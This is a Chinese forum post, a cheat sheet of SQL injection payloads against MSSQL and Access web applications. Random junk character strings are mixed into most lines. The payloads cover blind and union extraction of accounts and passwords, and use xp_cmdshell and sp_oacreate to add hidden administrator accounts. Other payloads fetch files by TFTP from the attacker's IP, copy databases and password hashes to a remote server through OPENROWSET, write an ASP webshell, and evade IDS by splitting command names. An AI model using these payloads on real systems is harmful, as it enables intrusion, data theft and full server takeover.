SQL注入语句2
发表于 2012-9-15 14:32:40
1..判断有无注入点 4 V* E7 |* p4 z2 i9 v5 z
; and 1=1 and 1=2 ) Y0 G- ?+ P* _# w
# x. h- ?8 n* B; K6 B/ [
$ r; B) v" F7 e1 q
2.猜表一般的表的名称无非是admin adminuser user pass password 等..
) w' X. S5 H! b, c& i1 Y3 Kand 0<>(select count(*) from *)
+ J: Q) D0 m: v0 n+ E: I/ {and 0<>(select count(*) from admin) ---判断是否存在admin这张表 / B2 T3 {) S0 M

& S3 c- p& P# V- w9 q
# F2 ]( f$ A  v4 a' j3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个 7 B  T* ?7 k1 B/ h. s5 m5 a
and 0<(select count(*) from admin)
/ e7 M& k- v9 Gand 1<(select count(*) from admin) : o( a/ N3 f! K* Z! S1 Y
猜列名还有 and (select count(列名) from 表名)>0
! a$ N4 J$ m" R1 M2 A! v
, g/ u- l! a, G: j) C
& a5 z2 [9 z% V4 H, t& b; d/ q4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称. ; x& o8 ^7 r- v  R
and 1=(select count(*) from admin where len(*)>0)-- 9 f1 Q6 @5 R6 t0 @  k9 t& x
and 1=(select count(*) from admin where len(用户字段名称name)>0)
% H0 l( N) E/ pand 1=(select count(*) from admin where len(密码字段名称password)>0) " G1 q8 y" }1 t: M7 n8 Z

7 B1 f1 V& a$ y& N7 R5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止 . i+ l) l9 w+ {7 d0 V
and 1=(select count(*) from admin where len(*)>0) 7 J. d& x3 k  ^7 N8 O
and 1=(select count(*) from admin where len(name)>6) 错误
. t" ^1 f" J9 F/ e) a: Dand 1=(select count(*) from admin where len(name)>5) 正确 长度是6   l" T! }$ E6 q. P
and 1=(select count(*) from admin where len(name)=6) 正确 " u, z* m; t4 t( ]/ n4 m
" V$ w) t3 {: H5 X# H
and 1=(select count(*) from admin where len(password)>11) 正确
) d* X- [* |1 Vand 1=(select count(*) from admin where len(password)>12) 错误 长度是12
1 m, M/ X- V2 f6 }and 1=(select count(*) from admin where len(password)=12) 正确 ) L; P/ W6 V" K& R! Z& U
猜长度还有 and (select top 1 len(username) from admin)>5
. g' \! t7 g& J3 @% W* p$ N  ^6 w6 U. [" I; R! K3 c5 t! |8 p6 R
; m7 Q" R6 S$ X! w% M1 _4 o% O3 C
6.猜解字符
, \3 ]1 F0 o& W0 A! eand 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位
* E" R4 {* F; [( @9 R  o' r+ w! P: K' Z! Rand 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位
, |8 l- P$ O( J3 e% c就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了
0 U/ W) ]9 B, R( D2 l
( u# F9 r  a5 [猜内容还有  and (select top 1 asc(mid(password,1,1)) from admin)>50  用ASC码算
: `& M4 M1 t3 R6 \2 Y9 Iand 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) -- 7 H4 J/ A! R4 F7 ~6 S6 @
这个查询语句可以猜解中文的用户和密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.
8 Q: c/ v- @2 x% ^1 Z+ l$ _
. t, ^) K- ?# J4 b6 T2 b, Z& mgroup by users.id having 1=1-- / p9 [8 r3 w) E2 ~- d
group by users.id, users.username, users.password, users.privs having 1=1-- . @+ G0 j3 u1 Q) E
; insert into users values( 666, attacker, foobar, 0xffff )-- 5 t6 Z" ^3 d( ]

% j  _1 m0 Z) h2 C8 g5 C) ~UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable- 7 `: e  O3 y* {* k! }- f- \
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id)-   _. I) U# H: \' D: u' E
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id,login_name)- & K: N: o" ~' N+ v) c% x3 Y
UNION SELECT TOP 1 login_name FROM logintable-
4 E/ W( W. I6 o1 J  [( OUNION SELECT TOP 1 password FROM logintable where login_name=Rahul--
0 E6 \& j- ]% E% Y9 _# J
, d0 ~- d5 Q5 J7 c7 [看服务器打的补丁=出错了打了SP4补丁
* m- U6 f) v4 \/ @6 {and 1=(select @@VERSION)-- 2 z! k% x' j7 f0 l+ ]% R

& q$ |! {( p% R  B. m0 @看数据库连接账号的权限,返回正常,证明是服务器角色sysadmin权限。
( ]! k6 ], ?. w7 Hand 1=(SELECT IS_SRVROLEMEMBER(sysadmin))--
' B  @* E* |. f2 g
7 L* a. G( t' m判断连接数据库帐号。(采用SA账号连接 返回正常=证明了连接账号是SA)
! G& O* m$ s0 l. Y' |, J. t* ^and sa=(SELECT System_user)--
2 M7 C; X4 d& ?# @- W0 G8 Hand user_name()=dbo-- + {& R  u- V1 N9 G3 O
and 0<>(select user_name()-- 6 M# |: z) g! H9 D9 F

1 {2 o; l/ {( y9 Q& E' V看xp_cmdshell是否删除 * O7 N! k( v8 H# v4 ~
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_cmdshell)--
. z( J4 @( V: o3 K# k( {+ O. u  W3 T* ^/ B! U3 [
xp_cmdshell被删除,恢复,支持绝对路径的恢复
/ a# T. |: X3 z$ \2 a, r;EXEC master.dbo.sp_addextendedproc xp_cmdshell,xplog70.dll-- . h1 e6 D2 ^" L3 f; i
;EXEC master.dbo.sp_addextendedproc xp_cmdshell,c:\inetpub\wwwroot\xplog70.dll--
9 {' U3 q9 o3 U; j. H2 o8 h; q  e" Q6 T: `7 U
反向PING自己实验 # ?7 t# f+ O- h; H8 P" R
;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";-- 6 S2 G" g% z7 m* h2 R! ~0 f5 \6 t2 [
: k3 _# v! p5 @9 m% i
加帐号 5 `4 P- m' V* l6 g1 e- m
;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add-- 9 r- u4 {2 [# R
) }+ w, N$ Z6 m
创建一个虚拟目录E盘: 0 J- G" }- s5 s; w( K$ a
;declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e:\"--
$ x, r7 d- X4 n5 @$ S9 H( V& O7 p, |# }( U& `
访问属性:(配合写入一个webshell)
3 T% @0 V" ?* {/ _( Jdeclare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse . Q. x7 F- R# q. z$ {# h4 ]
( m" ~4 u, v7 [- M% }5 f5 p; N; l% Q& f
* S3 c6 \0 ?; r
MSSQL也可以用联合查询
5 Q. f/ s( a  `6 I. w?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin + ], I$ u( [; ?& H# A
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union,access也好用)   Y* N. y5 J- ^0 Z1 m) j' c
- N2 Z! W1 ~! W0 ~6 h' S7 R! K1 t

' l" Q. b$ v# N1 b- A1 ^2 \爆库 特殊技巧:%5c=\ 或者把/和\ 修改%5提交
* a( @1 Z3 f$ e8 Y# J( u
+ Z. I* ^: }+ Z3 I4 @
7 G) D8 E+ }3 X* Q5 q6 h
8 v8 k( T' R; f9 y+ q; j$ V得到WEB路径
( |5 X/ `2 f- Q9 _;create table [dbo].[swap] ([swappass][char](255));--
  F9 H$ R% C0 u. C. F5 K; Q7 Jand (select top 1 swappass from swap)=1-- 4 ~! \" Y7 `7 w9 l, E# `4 \- Z' m
;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey=HKEY_LOCAL_MACHINE, @key=SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\, @value_name=/, values=@test OUTPUT insert into paths(path) values(@test)-- 7 \# l9 ]+ F8 w, _0 Q$ L) z
;use ku1;-- * g/ E) _9 n6 T' U) J( x2 F7 C
;create table cmd (str image);-- 建立image类型的表cmd
/ e+ I! [: W4 L& H$ z9 U9 [, Q- O' K3 G6 i# U' O! ~! ~
存在xp_cmdshell的测试过程: ' ?) \, [& d0 q, u9 U6 b) h, K* B
;exec master..xp_cmdshell dir % E$ [* Q; J# u) }
;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号
6 `( i# q$ W# A3 _& W( A;exec master.dbo.sp_password null,jiaoniang$,1866574;-- 9 W6 i( T7 J/ a3 R2 C( ]7 M
;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;-- - _( M5 G( u% B0 c
;exec master.dbo.xp_cmdshell net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add;--
) {/ s' m  O7 l0 L' a$ W3 w;exec master.dbo.xp_cmdshell net localgroup administrators jiaoniang$ /add;-- ! a, J! ]# ~: O; U( Z1 Z% J
exec master..xp_servicecontrol start, schedule 启动服务 1 S$ B: \( j. [' ?( {. ]
exec master..xp_servicecontrol start, server
' \0 E7 g8 D, B5 l# Q" r5 p8 B  N! r/ }; DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add 2 l5 a- S% k$ T, |
;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add
. j) s, H# @" a5 l" i; exec master..xp_cmdshell tftp -i youip get file.exe-- 利用TFTP上传文件 0 o" w, ^; p! m6 y7 R
# v7 |2 r$ }/ m1 O0 `
;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\ 9 Z. H) {+ U2 f3 p: i
;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\ + J4 b3 T9 \5 G) ^
;declare @a;set @a=db_name();backup database @a to disk=你的IP你的共享目录bak.dat / E9 m2 a  T9 l+ G
如果被限制则可以。
; f5 a% N$ Z( x( {1 G" R. \select * from openrowset(sqloledb,server;sa;,select OK! exec master.dbo.sp_addlogin hax)
: }3 E2 o$ s. v1 u
( w% K4 e: y& J# Y7 X( K查询构造:
( d3 y" y+ L9 o8 RSELECT * FROM news WHERE id=... AND topic=... AND ..... 8 `, S9 \2 ~  b+ I" I. O3 y: Q- N
adminand 1=(select count(*) from [user] where username=victim and right(left(userpass,01),1)=1) and userpass <>
5 t# p/ s) v; Iselect 123;-- / l0 g' |$ j" X, U' n" @+ O
;use master;-- ; x4 N9 G* w' w8 U3 {, Q
:a or name like fff%;-- 显示有一个叫ffff的用户哈。 ( ^  T) K( H0 A7 B8 j+ t& V1 g
and 1<>(select count(email) from [user]);-- 2 H7 z6 S+ Y! d, w1 Z
;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;--
! T! D0 R' a& k! Z; l;update [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad) where name=ffff;-- + O7 A# y( ~3 X  U
;update [users] set email=(select top 1 name from sysobjects where xtype=u and id>581577110) where name=ffff;--
$ _( `/ I7 K& }5 ^! M3 K;update [users] set email=(select top 1 count(id) from password) where name=ffff;-- 3 @+ @# `4 b: N& J7 d8 I2 |8 F
;update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;--
* e3 h6 E  Z& v( m' v1 A;update [users] set email=(select top 1 name from password where id=2) where name=ffff;--
. q0 X9 k4 n2 B3 O上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。
; x0 c" s" m) M% G通过查看ffff的用户资料可得第一个用表叫ad
/ |; L' E# r( O  D1 ], b3 S然后根据表名ad得到这个表的ID 得到第二个表的名字
- A# X, F0 F3 m3 S" W5 h3 q0 V9 X1 {$ {' U
insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)--
" R2 N9 G1 u, i; l6 Z: ?* M' P  finsert into users values( 667,123,123,0xffff)--
# A( }. H% C# |# m* K2 O/ P4 l+ Linsert into users values ( 123, admin--, password, 0xffff)-- ) W7 }' |. ]) }3 V* O7 O% i
;and user>0 ! h- r7 m$ T1 j  _
;and (select count(*) from sysobjects)>0
% k" z: h! C; g;and (select count(*) from mysysobjects)>0 //为access数据库 0 w+ X3 F6 {( {3 \

, z7 E. Z5 K1 X* f. |/ G2 \3 c枚举出数据表名 5 f5 V, f" C2 @/ N/ d
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0);-- 4 W, e" [) T) h$ n0 P
这是将第一个表名更新到aaa的字段处。 ; C8 i. ^, V! U$ X
读出第一个表,第二个表可以这样读出来(在条件后加上 and name<>刚才得到的表名)。 0 @" D4 J, W2 }' \9 |
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0 and name<>vote);-- + j! M" K- {0 _! ?3 W! K5 L( e
然后id=1552 and exists(select * from aaa where aaa>5)
, C- d- @% d, Y8 X$ R" g读出第二个表,一个个的读出,直到没有为止。 + x0 h& }% t5 o5 }
读字段是这样: . v/ H* h. L: s% Q& I2 c: a( J
;update aaa set aaa=(select top 1 col_name(object_id(表名),1));--
4 T; F! I" H, Y' w2 u/ I1 K然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名 + ?" g+ A; n& v& L- c$ c
;update aaa set aaa=(select top 1 col_name(object_id(表名),2));--
; k; o3 q. p' j  I然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名
: M, L/ ?# T" ^. y8 g) B/ ~4 ~& G
+ f9 K, g% |7 y' c2 q[获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名]   D2 t1 X/ V* c' ]- c# ~' R. n' M
update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>你得到的表名 查出一个加一个]) [ where 条件] select top 1 name from sysobjects where xtype=u and status>0 and name not in(table1,table2,…)
8 ^0 ^& @: `" U通过SQLSERVER注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组]
  p0 h  @8 E( U7 x
4 |; {' r* D) S3 a+ L) \) ^9 Y, q[获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名] & s6 _( r' m3 J, @: X
update 表名 set 字段=(select top 1 col_name(object_id(要查询的数据表名),字段列如:1) [ where 条件]
! k" F& M% D$ p4 z) b9 h, ^6 P& I: @
绕过IDS的检测[使用变量]
( t' G* S  i& ~# d: C# ?9 V; g. W6 a6 f3 r;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\ / k( y, ~1 o5 f. |, U$ y
;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\ 9 e# h9 [' A) K) {$ ^, N6 B

5 P, i# N5 Z4 i% y0 {7 Z$ X3 |" s1、 开启远程数据库 ' c: j7 [7 n" G3 s' M
基本语法 & O. v7 q; K- d- @1 ~! V* T
select * from OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1 ) 3 w3 {5 m3 O; f* Q
参数: (1) OLEDB Provider name 1 O& X1 v7 H0 N+ ?8 R: ]8 C
2、 其中连接字符串参数可以是任何端口用来连接,比如
# b" V( @* G3 ?" zselect * from OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;, select * from table ) Q7 j! H1 u7 j0 |7 |
3.复制目标主机的整个数据库insert所有远程表到本地表。 4 d( |6 W" D4 ?' }' U4 f. B/ c
! g5 D: g% M8 n, _
基本语法:
" a1 B8 w" r# |, `! j+ z5 Linsert into OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1) select * from table2
- ?! g! D, D  i* o% K' w0 G这行语句将目标主机上table2表中的所有数据复制到远程数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口,指向需要的地方,比如:
" M( P( g, [; K. K6 i* _insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from table2
. P. ]$ x- |- d0 y/ h7 y5 q3 I! Sinsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysdatabases)
; x! a! s& A6 aselect * from master.dbo.sysdatabases 7 o, [; N/ B4 c& A: N2 ]) D
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysobjects)
8 o5 [7 ?# i8 l; E3 l, I; bselect * from user_database.dbo.sysobjects 9 n6 m- z' i6 `. F
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _syscolumns) 0 C$ Z0 ?& e; E5 A* P5 z& Z
select * from user_database.dbo.syscolumns   |5 {, H. V. V8 a' v7 ~
复制数据库:
8 j; [9 s3 n, _8 P: ^! finsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from database..table1
4 B2 X% X, n% I# _7 }! x, binsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table2) select * from database..table2 : \( |& s, B. |6 P3 W
7 F1 O6 n: B7 R; E, y* {
复制哈西表(HASH)登录密码的hash存储于sysxlogins中。方法如下: 5 {4 q: }8 i4 z( f. S  u! W3 ~
insert into OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysxlogins) select * from database.dbo.sysxlogins
: f/ g3 s+ P, }: C/ W7 d; W7 `- n得到hash之后,就可以进行暴力破解。
2 {7 X+ M3 O9 R% Q$ ?  A% T' L
8 a  m+ l0 `, n9 Z# p2 S& x遍历目录的方法: 先创建一个临时表:temp
1 s; v- M( e! y" ~! \6 ^8 b* e;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 6 Y- p" u# Y. y5 V0 I; H; P& U
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
. S2 p( k5 A  ]& x; I;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- 获得子目录列表
8 u# c; N+ E% N8 Y. Z;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- 获得所有子目录的目录树结构,并寸入temp表中
! \0 z3 t1 a: i+ A;insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp;-- 查看某个文件的内容
4 n6 {2 s8 K8 m2 C/ J; W, h5 @;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\;--
  g# u8 f9 h" _. Q;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\ *.asp /s/a;-- : B+ y. n# {- m
;insert into temp(id) exec master.dbo.xp_cmdshell cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc
, n+ s8 n) n1 K9 {; u  Q% |2 ]0 {;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- (xp_dirtree适用权限PUBLIC) * N" i$ Z" t# J# F
写入表:
  C4 N' r" L4 ~  e: l( x: S语句1:and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));-- + ?" X* l3 N7 z: d7 `. E
语句2:and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));-- " T( d8 L/ ~* R+ G* ?
语句3:and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));--
! p- }: b' D4 X: U* W语句4:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));-- 9 {0 \3 {1 A2 @" R8 _$ c9 w6 _
语句5:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));-- . X! M/ n- |1 w4 ~
语句6:and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));-- 1 z8 U3 I8 R4 n* o. y. [9 }( [
语句7:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));-- 5 l+ x" s% o7 R0 K+ B
语句8:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));-- - l2 H# Y! k* }4 O. X
语句9:and 1=(SELECT IS_MEMBER(db_owner));-- 7 w5 G( K' R# H1 h  F; Y( b; U

1 F. S  [7 x* h  Q7 ?. C把路径写到表中去:   i$ T8 T& M8 n
;create table dirs(paths varchar(100), id int)-- # d9 b* n: P% |- b) z7 ?: k1 n7 k
;insert dirs exec master.dbo.xp_dirtree c:\-- 5 M0 S* G. s8 o% a! y  V5 X- ~
and 0<>(select top 1 paths from dirs)-- ) `2 n8 ]5 g  R0 d$ S
and 0<>(select top 1 paths from dirs where paths not in(@Inetpub))-- * h" R. P5 P+ D' e. G5 x
;create table dirs1(paths varchar(100), id int)--
% \8 }' ^6 _9 V  D;insert dirs exec master.dbo.xp_dirtree e:\web--
( ?8 B& M# d2 d/ pand 0<>(select top 1 paths from dirs1)--
7 [9 N. h: o; T4 E; V# z/ ^) ^4 H; |0 P3 m9 ^# |+ O" A
把数据库备份到网页目录:下载
  i9 J; _, w3 k( P;declare @a sysname; set @a=db_name();backup database @a to disk=e:\web\down.bak;--
( c% z1 Q6 k0 I" I2 s  ~; W
9 d, {6 I- r5 J4 ^and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc) 7 Y. O" z# Z( T3 Q/ L( r
and 1=(Select Top 1 col_name(object_id(USER_LOGIN),1) from sysobjects) 参看相关表。
  C: c6 u, o  e  q. @& f4 aand 1=(select user_id from USER_LOGIN)
" _3 N0 Y5 |, b  v0 Z# |- [5 tand 0=(select user from USER_LOGIN where user>1)
# X; X% i) u9 @' L: U; ~
8 J8 u. E- A3 {4 B$ ]-=- wscript.shell example -=-
6 o7 E# o" X: d! N4 Edeclare @o int ! ~) U9 m! F  i
exec sp_oacreate wscript.shell, @o out 7 M2 C5 V" b3 V
exec sp_oamethod @o, run, NULL, notepad.exe
3 ?& V8 J3 y& b2 }7 b- x; declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, notepad.exe-- , H2 I1 s" c8 F' |8 m

9 m% J; i: X3 Cdeclare @o int, @f int, @t int, @ret int
3 K+ n6 O' K6 k  z& Wdeclare @line varchar(8000) ' X1 t3 f8 v- A0 n6 v
exec sp_oacreate scripting.filesystemobject, @o out - \8 a  U; ^/ q" ^" U6 V
exec sp_oamethod @o, opentextfile, @f out, c:\boot.ini, 1
* Y) ^% H, @+ K* K' T9 t! oexec @ret = sp_oamethod @f, readline, @line out
6 e9 D' X1 u  M' A: I. B# O8 Kwhile( @ret = 0 )
0 {/ h/ [$ X$ m, T2 h4 rbegin
3 {3 C0 B6 I8 ]) a/ xprint @line * V6 W. u( F0 I% i4 F6 K
exec @ret = sp_oamethod @f, readline, @line out
& J7 ~4 p  X% A9 Q$ p) wend 0 _0 Q: ?) R8 N! t5 m* B) n

# M% A' ~, O7 ?declare @o int, @f int, @t int, @ret int
! I* x9 \) q0 a7 v% dexec sp_oacreate scripting.filesystemobject, @o out
6 D6 z! x% H' l9 p; K% K  bexec sp_oamethod @o, createtextfile, @f out, c:\inetpub\wwwroot\foo.asp, 1 0 Y) g  \; X/ k" N9 l- V# L) _
exec @ret = sp_oamethod @f, writeline, NULL, $ d# Y/ l4 ^1 N$ L+ q' a! c) ^
<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>
2 Z% i7 w" K8 r6 A2 u* {, h5 T8 `; Q! s; t  i
declare @o int, @ret int
4 ]' A1 X; C2 z% f5 z. vexec sp_oacreate speech.voicetext, @o out
; X2 s. Y3 y4 ~% d3 P9 l" ]" Vexec sp_oamethod @o, register, NULL, foo, bar
# ^" B7 Y8 f' E( E$ z" _" Nexec sp_oasetproperty @o, speed, 150
1 }: q; s) I1 y* B1 s1 {2 aexec sp_oamethod @o, speak, NULL, all your sequel servers are belong to,us, 528
; D6 [% \8 X) V4 s( qwaitfor delay 00:00:05 + z* p! }1 ~# h# j2 B5 `) ?( Z* ~

1 s* j; h1 j7 \& ~" o2 W; declare @o int, @ret int exec sp_oacreate speech.voicetext, @o out exec sp_oamethod @o, register, NULL, foo, bar exec sp_oasetproperty @o, speed, 150 exec sp_oamethod @o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay 00:00:05-- 9 i- h& f5 W% _' x/ f" Y+ w
3 g% p& q" i; i1 o# ~
xp_dirtree适用权限PUBLIC 2 x  r" A% p0 i4 o: l, X
exec master.dbo.xp_dirtree c:返回的信息有两个字段subdirectory、depth。Subdirectory字段是字符型,depth字段是整形字段。
3 E# [; C! Y  G. e+ f, ]create table dirs(paths varchar(100), id int)
0 S$ D1 b1 `; P  A: Y  o建表,这里建的表是和上面xp_dirtree相关连,字段相等、类型相同。 3 b9 J0 `, ^/ [
insert dirs exec master.dbo.xp_dirtree c:只要我们建表与存储进程返回的字段相定义相等就能够执行!达到写表的效果,一步步达到我们想要的信息!  f: j6 f" V- |: H! B8 z$ M0 m